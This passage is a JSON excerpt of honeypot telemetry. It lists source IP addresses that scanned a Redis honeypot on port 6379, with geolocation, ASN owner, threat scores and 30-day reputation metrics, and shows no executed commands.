        "first_seen_30d": "2026-03-22T10:26:29.062000+00:00",
        "last_seen_30d": "2026-03-29T15:18:34.879000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 14,
        "Honeytrap": 4,
        "Redishoneypot": 3,
        "ElasticPot": 1
      }
    },
    "20.29.47.111": {
      "attack_count": 15,
      "first_seen": "2026-03-10T08:10:57.000Z",
      "last_seen": "2026-03-10T08:13:46.654Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 37.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.0,
        "persistence": 11.7,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 25,
        "days_active_30d": 14,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-10T08:12:04.121000+00:00",
        "last_seen_30d": "2026-03-23T14:30:55.528000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Honeytrap": 7,
        "Redishoneypot": 3
      }
    },
    "91.230.168.140": {
      "attack_count": 14,
      "first_seen": "2026-03-07T00:02:47.000Z",
      "last_seen": "2026-03-07T00:03:53.791Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 88.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 220,
        "days_active_30d": 30,
        "ports_targeted_30d": 65,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T06:45:34.947000+00:00",
        "last_seen_30d": "2026-03-31T23:44:14.229000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 175,
        "Honeytrap": 41,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "91.230.168.149": {
      "attack_count": 14,
      "first_seen": "2026-03-20T21:06:11.000Z",
      "last_seen": "2026-03-20T21:07:17.211Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 82.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.8,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 120,
        "days_active_30d": 29,
        "ports_targeted_30d": 41,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T08:44:40+00:00",
        "last_seen_30d": "2026-03-30T22:39:09.571000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 76,
        "Honeytrap": 40,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "167.94.138.184": {
      "attack_count": 13,
      "first_seen": "2026-03-10T20:32:50.000Z",
      "last_seen": "2026-03-10T20:34:00.528Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 56.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 22.7,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 186,
        "days_active_30d": 20,
        "ports_targeted_30d": 46,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T00:01:49+00:00",
        "last_seen_30d": "2026-03-21T04:20:38.502000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 111,
        "Honeytrap": 48,
        "ElasticPot": 9,
        "ConPot": 6,
        "Cowrie": 6,
        "Redishoneypot": 6
      }
    },
    "167.94.138.201": {
      "attack_count": 13,
      "first_seen": "2026-03-15T13:39:14.000Z",
      "last_seen": "2026-03-15T13:40:20.190Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 58.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.3,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 136,
        "days_active_30d": 21,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T18:06:53+00:00",
        "last_seen_30d": "2026-03-22T07:11:47.649000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 89,
        "Honeytrap": 28,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "H0neytr4p": 4,
        "Honeyaml": 3,
        "Dionaea": 1,
        "Ipphoney": 1
      }
    },
    "199.45.154.145": {
      "attack_count": 13,
      "first_seen": "2026-03-02T20:10:48.000Z",
      "last_seen": "2026-03-02T20:11:58.242Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 88.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 63,
        "days_active_30d": 30,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T11:52:41+00:00",
        "last_seen_30d": "2026-03-31T05:24:34.222000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 32,
        "Honeytrap": 23,
        "Redishoneypot": 6,
        "Dionaea": 1,
        "Sentrypeer": 1
      }
    },
    "58.19.79.111": {
      "attack_count": 13,
      "first_seen": "2026-03-31T06:11:29.000Z",
      "last_seen": "2026-03-31T06:12:33.823Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Wuhan",
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 21.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T06:11:29+00:00",
        "last_seen_30d": "2026-03-31T06:12:33.823000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "91.230.168.17": {
      "attack_count": 13,
      "first_seen": "2026-03-27T21:14:36.000Z",
      "last_seen": "2026-03-27T21:15:56.515Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 80.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 119,
        "days_active_30d": 30,
        "ports_targeted_30d": 40,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T17:43:42+00:00",
        "last_seen_30d": "2026-03-31T13:15:17.983000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 74,
        "Honeytrap": 42,
        "Redishoneypot": 3
      }
    },
    "167.94.138.163": {
      "attack_count": 12,
      "first_seen": "2026-03-11T12:26:49.000Z",
      "last_seen": "2026-03-11T12:28:03.491Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 62.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.5,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 140,
        "days_active_30d": 22,
        "ports_targeted_30d": 38,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T03:47:02+00:00",
        "last_seen_30d": "2026-03-23T18:01:32.668000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 66,
        "Honeytrap": 59,
        "Miniprint": 6,
        "Redishoneypot": 6,
        "Adbhoney": 2,
        "Dicompot": 1
      }
    },
    "167.94.138.191": {
      "attack_count": 12,
      "first_seen": "2026-03-04T21:31:43.000Z",
      "last_seen": "2026-03-04T21:32:51.809Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 52.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 18.6,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 72,
        "days_active_30d": 19,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-04T19:39:47+00:00",
        "last_seen_30d": "2026-03-22T16:32:35.464000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 35,
        "Honeytrap": 30,
        "Redishoneypot": 6,
        "Dionaea": 1
      }
    },
    "61.53.96.38": {
      "attack_count": 12,
      "first_seen": "2026-03-22T12:04:47.000Z",
      "last_seen": "2026-03-22T12:05:58.127Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 14.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-22T12:04:47+00:00",
        "last_seen_30d": "2026-03-22T12:05:58.127000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 1
      }
    },
    "1.83.125.180": {
      "attack_count": 11,
      "first_seen": "2026-03-17T19:06:37.000Z",
      "last_seen": "2026-03-17T19:07:55.588Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 18.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 7.5,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 9,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-09T10:35:04+00:00",
        "last_seen_30d": "2026-03-17T19:07:55.588000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 4,
        "Suricata": 3,
        "Honeytrap": 1
      }
    },
    "119.45.236.191": {
      "attack_count": 11,
      "first_seen": "2026-03-28T20:23:59.000Z",
      "last_seen": "2026-03-28T20:25:07.664Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Nanjing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 18.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-28T20:24:00+00:00",
        "last_seen_30d": "2026-03-28T20:25:07.664000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 1
      }
    },
    "46.149.71.117": {
      "attack_count": 11,
      "first_seen": "2026-03-10T16:04:35.000Z",
      "last_seen": "2026-03-14T20:59:01.880Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": "Moscow",
      "asn": 9123,
      "as_org": "Jsc timeweb",
      "threat_score": 6.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 4.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 5,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T16:05:43.014000+00:00",
        "last_seen_30d": "2026-03-14T20:59:01.880000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "94.154.129.109": {
      "attack_count": 11,
      "first_seen": "2026-03-09T07:48:57.000Z",
      "last_seen": "2026-03-10T02:01:25.657Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Uzbekistan",
      "country_code": "UZ",
      "city": "Tashkent",
      "asn": 43647,
      "as_org": "Servercore Cis LLC",
      "threat_score": 3.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T07:50:07.954000+00:00",
        "last_seen_30d": "2026-03-10T02:01:25.657000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "118.196.34.36": {
      "attack_count": 10,
      "first_seen": "2026-03-19T20:09:16.000Z",
      "last_seen": "2026-03-23T08:35:47.225Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4811,
      "as_org": "China Telecom Group",
      "threat_score": 10.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 4.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 5,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-19T20:10:20.001000+00:00",
        "last_seen_30d": "2026-03-23T08:35:47.225000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "18.221.132.46": {
      "attack_count": 10,
      "first_seen": "2026-03-07T03:57:51.000Z",
      "last_seen": "2026-03-22T02:32:21.328Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 56.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 25.4,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 350,
        "days_active_30d": 24,
        "ports_targeted_30d": 161,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:04:50.734000+00:00",
        "last_seen_30d": "2026-03-25T19:59:30.349000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 350
      }
    },
    "182.253.116.60": {
      "attack_count": 10,
      "first_seen": "2026-03-16T08:27:10.000Z",
      "last_seen": "2026-03-16T08:28:18.607Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Indonesia",
      "country_code": "ID",
      "city": "Surabaya",
      "asn": 17451,
      "as_org": "BIZNET NETWORKS",
      "threat_score": 9.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-16T08:27:10+00:00",
        "last_seen_30d": "2026-03-16T08:28:18.607000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "185.180.141.37": {
      "attack_count": 10,
      "first_seen": "2026-03-02T07:16:18.000Z",
      "last_seen": "2026-03-02T07:17:27.023Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 77.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.0,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 101,
        "days_active_30d": 28,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T07:16:19+00:00",
        "last_seen_30d": "2026-03-29T02:42:06.563000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 68,
        "Honeytrap": 28,
        "Redishoneypot": 3,
        "H0neytr4p": 2
      }
    },
    "20.215.89.22": {
      "attack_count": 10,
      "first_seen": "2026-03-13T18:48:18.000Z",
      "last_seen": "2026-03-22T08:31:50.236Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Poland",
      "country_code": "PL",
      "city": "Warsaw",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 12.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-13T18:49:26.515000+00:00",
        "last_seen_30d": "2026-03-22T08:31:50.236000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "36.139.84.140": {
      "attack_count": 10,
      "first_seen": "2026-03-23T03:53:24.000Z",
      "last_seen": "2026-03-23T04:03:31.511Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 56046,
      "as_org": "China Mobile communications corporation",
      "threat_score": 14.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-23T03:53:25+00:00",
        "last_seen_30d": "2026-03-23T04:03:31.511000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "36.212.19.93": {
      "attack_count": 10,
      "first_seen": "2026-03-24T15:40:18.000Z",
      "last_seen": "2026-03-24T15:41:19.601Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 14.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T15:40:18+00:00",
        "last_seen_30d": "2026-03-24T15:41:19.601000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "48.214.25.59": {
      "attack_count": 10,
      "first_seen": "2026-03-07T19:10:06.000Z",
      "last_seen": "2026-03-07T19:11:17.140Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 3.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T19:10:07+00:00",
        "last_seen_30d": "2026-03-07T19:11:17.140000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "147.185.132.67": {
      "attack_count": 9,
      "first_seen": "2026-03-05T01:44:51.000Z",
      "last_seen": "2026-03-05T01:46:27.898Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 91.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 127,
        "days_active_30d": 30,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T03:29:27.910000+00:00",
        "last_seen_30d": "2026-03-31T01:13:02.547000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 87,
        "Honeytrap": 32,
        "Cowrie": 4,
        "Redishoneypot": 3,
        "CitrixHoneypot": 1
      }
    },
    "198.235.24.110": {
      "attack_count": 9,
      "first_seen": "2026-03-11T21:40:48.000Z",
      "last_seen": "2026-03-11T21:42:22.244Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 90.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 103,
        "days_active_30d": 30,
        "ports_targeted_30d": 32,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T08:34:40+00:00",
        "last_seen_30d": "2026-03-31T23:29:13.457000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 67,
        "Honeytrap": 25,
        "Cowrie": 4,
        "Dionaea": 3,
        "Redishoneypot": 3,
        "H0neytr4p": 1
      }
    },
    "34.123.78.31": {
      "attack_count": 9,
      "first_seen": "2026-03-20T23:00:14.000Z",
      "last_seen": "2026-03-20T23:01:20.179Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Council Bluffs",
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 11.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T23:00:14+00:00",
        "last_seen_30d": "2026-03-20T23:01:20.179000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "34.193.119.44": {
      "attack_count": 9,
      "first_seen": "2026-03-04T18:37:44.000Z",
      "last_seen": "2026-03-28T19:43:31.046Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 89.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 285,
        "days_active_30d": 30,
        "ports_targeted_30d": 86,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T00:33:15.712000+00:00",
        "last_seen_30d": "2026-03-31T19:42:46.591000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 242,
        "Honeytrap": 37,
        "ConPot": 3,
        "Dionaea": 3
      }
    },
    "4.147.233.182": {
      "attack_count": 8,
      "first_seen": "2026-03-18T04:24:01.000Z",
      "last_seen": "2026-03-18T04:25:10.541Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 10.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T04:24:01+00:00",
        "last_seen_30d": "2026-03-18T04:25:10.541000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "100.29.192.93": {
      "attack_count": 6,
      "first_seen": "2026-03-03T16:59:25.000Z",
      "last_seen": "2026-03-03T17:00:59.897Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 26.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 17.5,
        "diversity": 8,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 21,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T17:00:59.897000+00:00",
        "last_seen_30d": "2026-03-23T22:06:18.290000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "167.248.133.114": {
      "attack_count": 6,
      "first_seen": "2026-03-11T19:51:51.000Z",
      "last_seen": "2026-03-11T19:53:25.383Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 29.7,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 935,
        "days_active_30d": 22,
        "ports_targeted_30d": 886,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:08:40.592000+00:00",
        "last_seen_30d": "2026-03-23T20:19:19.312000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 935
      }
    },
    "172.236.96.75": {
      "attack_count": 6,
      "first_seen": "2026-03-02T12:36:59.000Z",
      "last_seen": "2026-03-02T12:38:00.445Z",
      "sessions": 0,
      "ports": [
        6379
      ],
